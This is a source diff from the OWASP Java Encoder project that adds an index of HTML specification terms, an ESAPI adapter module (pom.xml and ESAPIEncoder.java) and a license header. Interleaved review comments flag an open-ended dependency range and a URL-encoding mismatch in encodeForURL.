+parsing a date and\n time +parsing a date and time +parsing a global\n date and time +parsing a global date and time +parsing a month +parsing a time +parsing a week +parsing the attribute as a non-negative\n integer +partially available +past\n names map +past names map +pathname +pattern +patternMismatch +pause +pause() +pauseOnExit +paused +paused for user\n interaction +paused for user interaction +paused media\n controller +paused media\n controller +paused media controller +pending\n parsing-blocking script +pending\n application cache download process tasks +pending application\n cache download process tasks +pending application cache\n download process tasks +pending application cache download process\n tasks +pending parsing-blocking\n script +pending parsing-blocking\n script +pending parsing-blocking\n script +pending parsing-blocking script +pending table character\n tokens +persisted +personalbar +phrasing +phrasing\n content +phrasing\n content +phrasing\n content +phrasing content +pick +placeholder +placeholder\n label option +placeholder label\n option +placeholder label option +plain text file +plaintext +platform +play +play() +playback ended +playback has\n ended +playback has ended +playbackRate +played +playing +playing\n media controller +playing media\n controller +playing media\n controller +plugin +plugins +plugins are being\n sandboxed +plugins aren't being sandboxed +poly +popstate +port +position +possible track categories +poster +poster\n frame +poster\n frame +poster frame +potentially\n playing +potentially CORS-enabled fetch +potentially active +potentially playing +practical\n concerns +pragma-set default\n language +pragma-set default language +pre +pre-click activation\n steps +pre-click activation steps +preferred\n style sheet set +preferred MIME\n name +preferred MIME\n name +preferred MIME\n name +preferred MIME name +preferred MIME names +preferred style sheet set +prefetch +prefix match +prefix match\n patterns +preload 
+prepare +prepare a\n script +prepare a\n script +prepare a script +prepare an\n event +prepare an event +presentational\n hint +presentational\n hint +presentational hint +presentational hints +prev +prevents content\n from creating new auxiliary browsing contexts +prevents content from\n navigating browsing contexts other than the sandboxed browsing\n context itself +prevents content from\n navigating their top-level browsing context +prevents script from\n reading from or writing to the document.cookie IDL\n attribute +primary context +print +print when\n loaded +print() +printing\n steps +printing steps +process the iframe\n attributes +process the iframe attributes +processing model for navigating across\n documents +progress +prompt +protected mode +proto-URLs +protocol +provide +provide a stable\n state +provide such information +provides a paint\n source +provides a stable state +pubDate +pubdate +public list of\n any patent disclosures +public-html-comments@w3.org +pushState +pushState() +q +queryCommandEnabled +queryCommandIndeterm +queryCommandState +queryCommandSupported +queryCommandValue +queue +queue\n a task +queue a\n task +queue a\n task +queue a\n task +queue a\n task +queue a\n task +queue a\n task +queue a post-load task +queue a task +queue that task as a post-load task +queued +quirks\n mode +quirks mode +radio +radio button\n group +radio button group +radiogroup +rangeOverflow +rangeUnderflow +rank +ranked +ratechange +raw\n value +raw text +raw text elements +raw value +rb +re-resolved +read-only\n mode +read-only mode +read/write\n mode +read/write mode +readOnly +readiness\n state +readiness state +readonly +ready +ready for\n post-load tasks +ready for post-load\n tasks +ready for post-load tasks +readyState +readystatechange +rebuilding +receiving a set-cookie-string +reconstruct the active formatting elements +reconstruction of\n the active formatting elements +rect +rectangle +rectangle\n state +redirect steps +reentrant invocation 
of the\n parser +reentrant invocation of the parser +referrer +reflect +reflected +reflecting +refused to allow this document\n to be unloaded +refused to allow the document to be\n unloaded +refused to allow the document to be unloaded +register the names +registerContentHandler +registerContentHandler() +registerProtocolHandler +registerProtocolHandler() +rel +rel="" +relList +relevant\n application caches +relevant\n application cache +relevant application caches +reload +reload\n override buffer +reload\n override flag +reload override\n flag +reload override\n buffer +reload override\n flag +reload override buffer +reload override flag +remove +removeCue +removed +removed from +removed from a\n Document +removed from a\n document +removed from a document +render the drag feedback +rendered legend +rendering rules +replace +replace() +replaceState +replaceState() +replacement\n enabled +replacement\n enabled +replacement\n enabled +replacement\n enabled +replacement\n enabled +replacement enabled +replacement must be enabled +report an error +report the controller\n state +report the controller state +report the error +reporting script errors +represent +represented +represented by\n the collection +represented by the\n collection +represented by the\n collection +represented by the collection +represents +required +reset +reset\n algorithm +reset algorithm +reset the form\n owner +reset the form owner +resettable +resettable\n element +resettable element +resolve +resolveURL +resolved +resolving +resolving of relative URLs +resolving relative URLs +resource +resource\n fetch algorithm +resource fetch\n algorithm +resource fetch\n algorithm +resource fetch algorithm +resource metadata management +resource selection\n algorithm +resource selection\n algorithm +resource selection\n algorithm +resource selection algorithm +resource sharing check +restrictions +resulting\n autocompletion state +resulting autocompletion\n state +resulting autocompletion state 
+return\n value +return value +returnValue +returned to the script +rev +reversed +right +root\n element +root\n element +root\n element of a Document object +root element +row +row\n groups +row group +row group\n headers +row groups +row header +rowIndex +rowSpan +rowgroup +rows +rowspan +rp +rt +rtl +ruby +rules +rules\n for distinguishing if a resource is text or binary +rules\n for parsing non-negative integers +rules\n for updating the text track rendering +rules for\n constructing the chapter tree from a text track +rules for parsing\n manifests +rules for parsing\n floating point number values +rules for parsing\n integers +rules for parsing\n floating point number values +rules for parsing\n non-negative integers +rules for parsing a\n legacy color value +rules for parsing a hash-name reference +rules for parsing a legacy\n color value +rules for parsing a legacy color\n value +rules for parsing a legacy color value +rules for parsing a list of dimensions +rules for parsing a list of integers +rules for parsing dimension values +rules for parsing floating\n point number values +rules for parsing floating point\n number values +rules for parsing floating point number\n values +rules for parsing floating point number values +rules for parsing integers +rules for parsing non-negative\n integers +rules for parsing non-negative\n integers +rules for parsing non-negative\n integers +rules for parsing non-negative integers +rules for parsing signed integers +rules for parsing simple color values +rules for serializing simple color values +rules for updating\n the text track rendering +rules for updating the\n display of WebVTT text tracks +rules for updating the display of\n WebVTT text tracks +rules for updating the display of WebVTT\n text tracks +rules for updating the display of WebVTT text\n tracks +rules for updating the text\n track rendering +rules for updating the text track\n rendering +rules for updating the text track rendering +run\n pre-click 
activation steps +run\n canceled activation steps +run canceled activation\n steps +run post-click activation steps +run pre-click\n activation steps +run synthetic click\n activation steps +run synthetic click activation\n steps +run synthetic click activation steps +runs +s +salvageable +same +same\n origin +same\n origin +same\n origin +same\n origin +same origin +samp +sandbox +sandboxed\n automatic features browsing context flag +sandboxed\n automatic features browsing context flag +sandboxed\n navigation browsing context flag +sandboxed\n top-level navigation browsing context flag +sandboxed\n plugins browsing context flag +sandboxed automatic features browsing\n context flag +sandboxed forms\n browsing context flag +sandboxed into a unique origin +sandboxed navigation browsing context flag +sandboxed origin\n browsing context flag +sandboxed plugins browsing context flag +sandboxed scripts browsing context flag +sandboxed seamless iframes flag +sandboxed top-level navigation browsing\n context flag +satisfies its constraints +satisfy its constraints +satisfy their\n constraints +scheme +scope +scoped +script +script\n content restrictions +script\n data escaped state +script\n execution environment +script\n documentation +script content restrictions +script data\n state +script data\n double escaped state +script data\n escaped state +script data\n state +script data double escape end state +script data double escape start\n state +script data double escaped\n state +script data double escaped dash\n state +script data double escaped dash dash\n state +script data double escaped less-than\n sign state +script data double escaped state +script data end tag name state +script data end tag open state +script data escape start dash\n state +script data escape start state +script data escaped dash dash\n state +script data escaped dash state +script data escaped end tag name\n state +script data escaped end tag open state +script data escaped less-than sign\n 
state +script data escaped state +script data less-than sign state +script data state +script documentation +script error notifications +script execution environment +script nesting level +script's\n browsing context +script's\n document +script's\n global object +script's URL character\n encoding +script's URL character\n encoding +script's URL character encoding +script's base URL +script's browsing\n context +script's browsing context +script's document +script's global\n object +script's global\n object +script's global object +script-created parser +scripting +scripting disabled +scripting flag +scripting is\n disabled +scripting is\n disabled +scripting is disabled +scripting is enabled +scripting was enabled +scripting was enabled or not +scripts +scroll +scroll an element into view +scroll to the fragment\n identifier +scroll to the fragment identifier +scrollAmount +scrollDelay +scrollbars +scrolling +seamless +seamless\n browsing context flag +seamless\n browsing context flag +seamless\n iframe +seamless browsing context flag +search +secondary\n browsing context +secondary browsing\n context +section +section\n 6 of the W3C Patent Policy +sectionRowIndex +sectioning +sectioning\n content +sectioning\n content +sectioning\n root +sectioning content +sectioning root +sectioning roots +sections +secured +seek +seek the\n media controller +seek the\n media controller +seek the media\n controller +seek the media controller +seekable +seeked +seeking +select +select() +selected +selected\n coordinate +selected\n files +selected files +selectedIndex +selectedOptions +selectedness +selectionDirection +selectionEnd +selectionStart +self +self-closing start tag\n state +self-closing start tag state +sends a signal +session\n history entry +session\n histories +session\n history +session histories +session history +session history\n entry +session history\n entry +session history entries +session history entry +set\n of space-separated tokens +set of\n scripts that 
will execute as soon as possible +set of\n scripts that will execute as soon as possible +set of\n comma-separated tokens +set of comma-separated tokens +set of space-separated\n tokens +set of space-separated tokens +set the document's address +set the value of a new\n indexed property +setCustomValidity +setCustomValidity() +setData +setDragImage +setDragImage() +setInterval +setInterval() +setSelectionRange +setSelectionRange() +setTimeout +setTimeout() +setter +setter creator +shape +sheet +should be used +showModalDialog +showModalDialog() +showing +showing by\n default +showing by default +shows caching\n progress +shows caching progress +simple\n color +simple\n color +simple color +single page HTML +size +sizes +skip White_Space\n characters +slaved +slaved\n media elements +slaved\n media elements +slaved media\n elements +slaved media\n elements +slaved media element +slaved media elements +slide +slots +small +snapToLines +sniffed type of the\n resource +soft +source +source\n node +source\n node +source\n browsing context +source\n browsing context +source browsing\n context +source browsing\n context +source browsing\n context +source browsing context +source node +space\n characters +space\n characters +space\n character +space\n characters +space\n characters +space\n characters +space character +space characters +spacer +span +special +specially focusable +specified +specifies +specifies an\n operation +specify an\n operation +spellcheck +spin the event loop +spins\n the event loop +split it on\n spaces +split on\n spaces +split on\n spaces +split on spaces +split the\n attribute's value on spaces +split the\n string on commas +split the attribute value on commas +split the attribute's\n value on spaces +split the content\n attribute on spaces +splitting value on spaces +splitting on commas +src +srcdoc +srclang +stack\n of open elements +stack\n of open elements +stack of\n open elements +stack of\n open elements +stack of\n open elements +stack of 
open\n elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open elements +stall timeout +stalled +standby +start +start\n tag +start\n times +start tag +start time +start times +startOffsetTime +startTime +state +state\n objects +state object +state objects +statically validate the\n constraints +status +statusbar +step +step\n base +step base +step scale\n factor +step scale factor +stepDown +stepDown() +stepMismatch +stepUp +stepUp() +steps to expose a\n media-resource-specific text track +stop +stop parsing +stopped +stopped due to errors +stopped parsing +stops +stops\n parsing +storage\n mutex +storage mutex +strictly splitting the\n string +strike +strip leading\n and trailing whitespace +strip leading and\n trailing whitespace +strip leading and\n trailing whitespace +stripped line breaks +stripping leading and trailing whitespace +strong +structured\n clone +structured\n clone +structured clone +style +style rule suggested in the rendering\n section +style sheet\n ready +style sheet ready +stylesheet +styling processing\n model +styling processing model +sub +submit +submit\n button +submit\n buttons +submit button +submit buttons +submit() +submittable +submittable elements +submitted +submitting +subscribe +subtitle +subtitles +suffer from a step\n mismatch +suffer from a step mismatch +suffering from a\n type mismatch +suffering from a custom\n error +suffering from a custom error +suffering from a pattern mismatch +suffering from a step mismatch +suffering from a type mismatch +suffering from an\n overflow +suffering from an\n underflow +suffering from an overflow +suffering from an underflow +suffering from being\n missing +suffering from being missing +suffering from being too long +suggestions\n source element +suggestions source\n element +suggestions source element +summary +sup +support the scripting\n language +supported\n property names +supported property\n indices 
+supported property indices +supported property names +supporting the suggested\n default rendering +suspend +svg +swapCache +swapCache() +synchronous\n section +synchronous\n section +synchronous\n sections +synchronous\n section +synchronous section +synchronous sections +syntax for which +tBodies +tFoot +tHead +tabIndex +tabindex +table +table\n model +table layout techniques +table model +table model\n errors +table model error +tables +tag +tag\n name state +tag cloud +tag name +tag name\n state +tag open state +tags +target +target element +task +task\n queue +task\n queue +task\n queues +task\n queues +task\n source +task\n queue +task queue +task queues +task source +task sources +tasks +tbody +td +techniques for describing\n tables +tel +temporary\n buffer +temporary buffer +term +text +text\n track cue writing direction +text\n track +text\n track cue writing direction +text\n track +text\n nodes +text\n track +text\n track cue active flag +text\n track kind +text\n tracks +text\n node +text\n track +text\n track cue size +text\n track cue writing direction +text\n track mode +text\n tracks +text field +text node +text nodes +text track +text track\n cue +text track\n mode +text track\n cue order +text track\n cues +text track\n cue +text track\n cue display state +text track\n cue start time +text track\n kind +text track\n label +text track\n mode +text track\n cue +text track\n cues +text track\n mode +text track\n readiness state +text track cue +text track cue\n display state +text track cue\n pause-on-exit flag +text track cue\n active flag +text track cue\n end time +text track cue\n identifier +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n start time +text track cue\n text +text track cue\n writing direction +text track cue\n identifier +text track cue\n order +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n text +text track cue active\n flag +text track cue active\n flag +text track cue 
active flag +text track cue display state +text track cue end\n time +text track cue end\n time +text track cue end time +text track cue identifier +text track cue order +text track cue pause-on-exit\n flag +text track cue pause-on-exit\n flag +text track cue pause-on-exit flag +text track cue size +text track cue start\n time +text track cue start\n time +text track cue start time +text track cue text +text track cue writing\n direction +text track cue writing direction +text track cues +text track disabled +text track failed to load +text track hidden +text track kind +text track label +text track language +text track list of cues +text track loaded +text track loading +text track mode +text track not loaded +text track readiness\n state +text track readiness\n state +text track readiness state +text track showing +text tracks +text-level semantics\n usage summary +text/cache-manifest +text/html +text/plain +textContent +textLength +textPosition +textTracks +textTracks[ +textarea +textarea effective height +textarea effective width +tfoot +th +that algorithm +the\n resource's Content-Type metadata +the\n script block's type +the\n script block's type +the\n resource's Content-Type metadata +the\n directionality +the\n document's address +the\n title element +the\n address +the\n directionality +the\n document's current address +the\n script block's type +the\n title element +the\n conditions described above +the\n incumbent body element +the\n html element +the\n HTML syntax +the\n active formatting elements are reconstructed +the\n body element +the\n directionality +the\n document's address +the\n document's current address +the\n drag data item kind +the\n link is an alternative stylesheet +the\n rules for choosing a browsing context given a browsing context\n name +the\n script settings determined from the node +the Document's address +the applet\n element +the embed element +the head\n element +the head element +the html element +the object element +the 
title\n element +the title element +the origin it was\n assigned when its browsing context was created +the HTML\n syntax +the HTML syntax +the URL given by this\n link +the W3C CVS server +the XHTML\n syntax +the XHTML\n syntax +the XHTML syntax +the attributes common to all media\n elements +the body\n element +the body\n element +the body\n element +the body element +the current address +the directionality +the document's\n address +the document's\n current address +the document's\n address +the document's address +the document's current\n address +the document's current address +the document's domain +the drag data\n item type string +the drag data item\n kind +the drag data item\n kind +the drag data item\n kind +the drag data item kind +the drag data item type\n string +the drag data item type string +the encoding of the\n document itself +the event handler processing algorithm +the example in the File\n Upload state section +the handling for misnested tags +the indicated part of the\n document +the indicated part of the\n document +the indicated part of the document +the link is an\n alternative stylesheet +the location bar BarProp\n object +the manifest +the menu bar BarProp\n object +the next step +the personal bar BarProp\n object +the rendering section +the requirements given in the prose +the resource's Content-Type\n metadata +the resource's Content-Type\n metadata +the rules\n described previously +the rules for choosing a\n browsing context given a browsing context name +the rules for choosing a browsing context given a\n browsing context name +the rules for choosing a browsing context given a browsing\n context name +the script\n block's type +the script\n settings determined from the node +the script block's\n character encoding +the script block's\n type +the script block's\n type +the script block's character encoding +the script block's fallback character\n encoding +the script block's fallback character\n encoding +the script block's source 
+the script block's type +the scrollbar BarProp\n object +the section on\n footnotes +the section the linking element is most\n closely associated with +the sniffed type of the resource +the stack +the status bar BarProp\n object +the step labeled\n "fragment identifiers" +the text tracks are ready +the toolbar BarProp\n object +thead +their document's current\n address +this +this is\n a reference, not a copy +this is a reference, not a copy +through which +time +time-zone\n offset +time-zone offset +timeline\n offset +timeline offset +timeupdate +title +toBlob +toDataURL +toDataURL() +toggle +tokenization +tokenizer +tooLong +toolbar +top +top-level\n browsing context +top-level\n browsing context +top-level\n browsing context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n contexts +top-level browsing context +top-level browsing contexts +tr +track +track\n URL +track\n label +track URL +track label +track language +trademark +transparent +transparently follow the redirect +traverse the\n history by a delta +traverse the history by\n a delta +traverse the history by a\n delta +traverse the history by a delta +traversing the\n history +tree\n order +tree\n order +tree\n construction +tree\n order +tree construction +tree order +true-by-default +trueSpeed +truespeed +trusted +tt +turn off +turned off +turned on +type +type\n sniffing rules +type blacklist +type information +type string +typeMismatch +typeMustMatch +typemustmatch +types +u +ul +unavailable +undo transaction history +unfocusing\n steps +unfocusing steps +unique\n identifier +unique identifier +unique identifier (ID) +unit\n of related similar-origin browsing contexts +unit of\n related similar-origin browsing contexts +unit of related browsing\n contexts +unit of related browsing contexts +unit of related similar-origin browsing\n contexts +unit of related similar-origin browsing contexts +unload a\n 
document +unload a document +unloading document cleanup steps +unordered\n set of unique space-separated tokens +unordered set of unique\n space-separated tokens +unordered set of unique space-separated tokens +unquoted +unregisterContentHandler +unregisterProtocolHandler +up +update +update\n status +update status +update the\n image data +update the\n session history with the new page +update the image data +update the session\n history with the new page +update the session history with\n the new page +update the session history with the new\n page +update the session history with the new page +updated the image\n data +updateready +updating the session history with\n the new page +upgrade\n attempt +upgrade\n attempt +upgrade attempt +use the plugin that supports resource type +use-credentials +useMap +used during the parsing +usemap +user\n interaction task source +user interaction +user interaction task\n source +user interaction task\n source +user interaction task source +userAgent +using the\n rules for +using the rules for +vAlign +vCard MIME Directory\n Profile +vLink +valid +valid\n URL +valid\n integer +valid\n MIME type +valid\n date string +valid\n date string in content with optional time +valid\n floating point number +valid\n floating point numbers +valid\n forced-UTC global date and time string +valid\n global date and time string +valid\n integer +valid\n local date and time string +valid\n media query +valid\n month string +valid\n non-empty URL potentially surrounded by spaces +valid\n non-negative integers +valid\n simple color +valid\n time string +valid\n week string +valid MIME\n type +valid MIME type +valid MIME type with no parameters +valid MIME types with no parameters +valid URL +valid URL\n potentially surrounded by spaces +valid URL potentially\n surrounded by spaces +valid URL potentially surrounded by\n spaces +valid browsing\n context name or keyword +valid browsing\n context names or keywords +valid browsing context\n name +valid 
browsing context\n name or keyword +valid browsing context name +valid browsing context name\n or keyword +valid date\n string +valid date or\n time string +valid date or time string +valid date or time string in content +valid date string +valid date string with\n optional time +valid date string with optional\n time +valid e-mail address +valid e-mail address\n list +valid e-mail address list +valid floating\n point number +valid floating point\n number +valid floating point\n numbers +valid floating point number +valid floating point numbers +valid forced-UTC\n global date and time string +valid forced-UTC global date and time\n string +valid global\n date and time string +valid global date and\n time strings +valid global date and\n time string +valid global date and time\n string +valid global date and time string +valid hash-name reference +valid integer +valid integers +valid list of\n integers +valid local date and\n time string +valid local date and time\n string +valid local date and time string +valid lowercase simple color +valid media query +valid month\n string +valid month string +valid non-empty\n URL potentially surrounded by spaces +valid non-empty URL +valid non-empty URL potentially\n surrounded by spaces +valid non-empty URL potentially surrounded by\n spaces +valid non-negative\n integer +valid non-negative\n integers +valid non-negative integer +valid simple color +valid time\n string +valid time string +valid week\n string +valid week string +validationMessage +validity +validity states +valign +value +value\n sanitization algorithm +value mode\n flag +value mode flag +value sanitization\n algorithm +value sanitization\n algorithm +value sanitization algorithm +values +valueAsDate +valueAsDate +valueAsNumber +valueMissing +valueType +values +values are\n reset +valuetype +var +various W3C HTML WG\n lists +various WHATWG lists +version +vertical\n growing right +vertical growing\n left +vertical growing\n right +vertical growing\n left 
+vertical growing left +vertical growing right +video +videoHeight +videoTracks +videoWidth +violation +visible +vlink +vlinkColor +void elements +volume +volumechange +vspace +waiting +wbr +web developer edition +week +week number of\n the last day +week number of the last day +whatwg@whatwg.org +when the metadata of the clip becomes\n known +whitelisted scheme +whitespace +whitespace trimming +width +width of the\n select's labels +will +will\n not +will be fired +will cause +willValidate +willful\n violation +willful violation +window +window.alert() +window.applicationCache +window.close() +window.open() +wrap +write +writeln +writing direction +xml:base +xml:lang +xmp +yet more restrictions +yieldForStorageUpdates diff --git a/esapi/pom.xml b/esapi/pom.xml new file mode 100644 index 0000000..cc26851 --- /dev/null +++ b/esapi/pom.xml @@ -0,0 +1,73 @@ + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2.3 + + + encoder-esapi + jar + + ESAPI Thunk + + The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder + Projects API into an implementation of ESAPI. + + + + org.owasp.encoder.esapi + + + + + org.owasp.encoder + encoder + ${project.parent.version} + + + org.owasp.esapi + esapi + [2.2.3.1,3) + + + diff --git a/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java new file mode 100644 index 0000000..02334bd --- /dev/null +++ b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java 
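Review bot: The esapi dependency added in the new esapi/pom.xml is declared with an open-ended version range, `[2.2.3.1,3)`, so the artifact that resolves can change between builds without any edit to this file; that makes the build non-reproducible and lets a newly published 2.x release be pulled in without review. Pinning an exact version (for example `2.2.3.1`) or managing it in the parent's dependencyManagement keeps resolution deterministic. The element tags appear stripped in this rendering, so I am reading the `org.owasp.esapi` / `esapi` / `[2.2.3.1,3)` triple as a dependency coordinate; if the range is intentional so the thunk compiles against whatever ESAPI the consuming application supplies, a `provided` scope with a pinned version expresses that more safely.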
@@ -0,0 +1,254 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.esapi; + +import java.io.IOException; +import java.net.URI; +import org.owasp.encoder.Encode; +import org.owasp.esapi.Encoder; +import org.owasp.esapi.codecs.Codec; +import org.owasp.esapi.errors.EncodingException; +import org.owasp.esapi.reference.DefaultEncoder; + +/** + * ESAPIEncoder is a singleton implementation of the ESAPI Encoder API. 
It + * is meant to allow quick and easy drop-in replacement of the default + * encoder included with the ESAPI library, as the Encoder libraries are + * faster and use less memory thus cause fewer garbage collections. + * + *

    Please note that the OWASP Java Encoders does not implement all + * the encodings of the ESAPI Encoder API. In such situations this + * implementation will fallback onto the default reference implementation + * included with ESAPI. Thus you should see the performance benefit from + * the methods included in the Encoder, but still maintain compatibility + * with all methods from ESAPI Encoder.

    + * + *

    For clarity, the reason the OWASP Java Encoders do not include some + * of the ESAPI library is that the Encoders library is specifically focused + * on encoding, and thus does not include:

    + * + *
      + *
    • Input validation/normalization methods: + * {@link org.owasp.esapi.Encoder#canonicalize(String)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean, boolean)} + * {@link org.owasp.esapi.Encoder#getCanonicalizedURI(URI)}
    • + * + *
    • Decoding methods: + * {@link org.owasp.esapi.Encoder#decodeForHTML(String)}, + * {@link org.owasp.esapi.Encoder#decodeFromURL(String)}
    • + * + *
    • Binary-to-text/text-to-binary: + * {@link org.owasp.esapi.Encoder#encodeForBase64(byte[], boolean)}, + * {@link org.owasp.esapi.Encoder#decodeFromBase64(String)}.
    • + * + *
    • Bind-able APIs (such as {@link java.sql.PreparedStatement}: + * {@link org.owasp.esapi.Encoder#encodeForSQL(org.owasp.esapi.codecs.Codec, String)}, + * {@link org.owasp.esapi.Encoder#encodeForXPath(String)}, + * {@link org.owasp.esapi.Encoder#encodeForOS(org.owasp.esapi.codecs.Codec, String)}
    • + * + *
    • Rarely-used or alternate compatible encoding: + * {@link org.owasp.esapi.Encoder#encodeForVBScript(String)}, + * {@link org.owasp.esapi.Encoder#encodeForLDAP(String)}, + * {@link org.owasp.esapi.Encoder#encodeForLDAP(String, boolean)}, + * {@link org.owasp.esapi.Encoder#encodeForDN(String)}
    • + *
    + * + *

    (Please note that with sufficient feedback from the user base, the above + * mentioned methods may be implemented in future releases of the OWASP + * Java Encoders, if/when that happens, this shim class will be updated to + * call out to the new methods.)

    + * + *

    You may notice that this class does not actually implement Encoder + * itself. Instead it simply provides a {@link #getInstance()} method that + * does. This allows the implementation details maximum flexibility by not + * creating a any public API that would restrict changes later

    + * + * @author jeffi + */ +public final class ESAPIEncoder { + + /** No instances. */ + private ESAPIEncoder() {} + + /** + * Returns an instance of the Encoder. This method is the only supported + * mechanism by which an ESAPIEncoder instance should be obtained. The + * returned implementation is guaranteed to be thread-safe for the methods + * that the OWASP Java Encoders implement (see class documentation). + * Though not a requirement of the ESAPI Encoder API, the returned value + * is also serializable. + * + * @return An encoder implementation that uses the OWASP Java Encoders + * for most of the common encoding methods. + */ + public static Encoder getInstance() { + return Impl.INSTANCE; + } + + /** + * This is the private singleton that implements the ESAPI Encoder shim. + * It is implemented as a single-value enum to get all the "free" singleton + * properties associated with enums--such as serialization, and on-demand + * initialization. + * + *

    The implementation is intentionally private to avoid any API baggage. + * The instance should be obtained using + * {@link org.owasp.encoder.esapi.ESAPIEncoder#getInstance()}.

    + */ + private enum Impl implements Encoder { + /** + * The singleton instance. + */ + INSTANCE; + + /** + * The reference encoder from ESAPI. Any ESAPI method without an + * OWASP Java Encoder equivalent is delegated to this instance. + */ + private final Encoder _referenceEncoder = DefaultEncoder.getInstance(); + + /** {@inheritDoc} */ + public String canonicalize(String s) { + return _referenceEncoder.canonicalize(s); + } + + /** {@inheritDoc} */ + public String canonicalize(String s, boolean strict) { + return _referenceEncoder.canonicalize(s, strict); + } + + /** {@inheritDoc} */ + public String canonicalize(String s, boolean restrictMultiple, boolean restrictMixed) { + return _referenceEncoder.canonicalize(s, restrictMultiple, restrictMixed); + } + + /** {@inheritDoc} */ + public String getCanonicalizedURI(URI dirtyUri) { + return _referenceEncoder.getCanonicalizedURI(dirtyUri); + } + + /** {@inheritDoc} */ + public String encodeForCSS(String s) { + return Encode.forCssString(s); + } + + /** {@inheritDoc} */ + public String encodeForHTML(String s) { + return Encode.forHtml(s); + } + + /** {@inheritDoc} */ + public String decodeForHTML(String s) { + return _referenceEncoder.decodeForHTML(s); + } + + /** {@inheritDoc} */ + public String encodeForHTMLAttribute(String s) { + return Encode.forHtmlAttribute(s); + } + + /** {@inheritDoc} */ + public String encodeForJavaScript(String s) { + return Encode.forJavaScript(s); + } + + /** {@inheritDoc} */ + public String encodeForVBScript(String s) { + return _referenceEncoder.encodeForVBScript(s); + } + + /** {@inheritDoc} */ + public String encodeForSQL(Codec codec, String s) { + return _referenceEncoder.encodeForSQL(codec, s); + } + + /** {@inheritDoc} */ + public String encodeForOS(Codec codec, String s) { + return _referenceEncoder.encodeForOS(codec, s); + } + + /** {@inheritDoc} */ + public String encodeForLDAP(String s) { + return _referenceEncoder.encodeForLDAP(s); + } + + /** {@inheritDoc} */ + public String 
encodeForLDAP(String s, boolean b) { + return _referenceEncoder.encodeForLDAP(s, b); + } + + /** {@inheritDoc} */ + public String encodeForDN(String s) { + return _referenceEncoder.encodeForDN(s); + } + + /** {@inheritDoc} */ + public String encodeForXPath(String s) { + return _referenceEncoder.encodeForXPath(s); + } + + /** {@inheritDoc} */ + public String encodeForXML(String s) { + return Encode.forXml(s); + } + + /** {@inheritDoc} */ + public String encodeForXMLAttribute(String s) { + return Encode.forXmlAttribute(s); + } + + /** {@inheritDoc} */ + public String encodeForURL(String s) throws EncodingException { + return Encode.forUri(s); + } + + /** {@inheritDoc} */ + public String decodeFromURL(String s) throws EncodingException { + return _referenceEncoder.decodeFromURL(s); + } + + /** {@inheritDoc} */ + public String encodeForBase64(byte[] bytes, boolean wrap) { + return _referenceEncoder.encodeForBase64(bytes, wrap); + } + + /** {@inheritDoc} */ + public byte[] decodeFromBase64(String s) throws IOException { + return _referenceEncoder.decodeFromBase64(s); + } + + } +} diff --git a/esapi/src/main/resources/META-INF/LICENSE b/esapi/src/main/resources/META-INF/LICENSE new file mode 100644 index 0000000..f66c375 --- /dev/null +++ b/esapi/src/main/resources/META-INF/LICENSE 
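Review bot: `encodeForURL` delegates to `Encode.forUri(s)`, whose contract is to percent-encode a complete URI and leave reserved delimiters such as `&`, `=`, `?` and `#` in place, whereas the ESAPI reference `encodeForURL`, if I remember the DefaultEncoder correctly, URL-encodes the whole string the way `URLEncoder` does. A caller that used the reference behaviour to escape a query-parameter value therefore gets those delimiters through unencoded after this drop-in swap, which is the one place the "compatibility with all methods from ESAPI Encoder" promise in the class Javadoc does not hold. `Encode.forUriComponent(s)` is the closer equivalent; if `forUri` is intentional, the class Javadoc should name this deviation next to the list of delegated methods. The null-input contract is likely different as well (the reference encoder passes null through, while the `Encode` methods, as far as I recall, emit the literal text "null"), so a sentence on that belongs in the same place.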
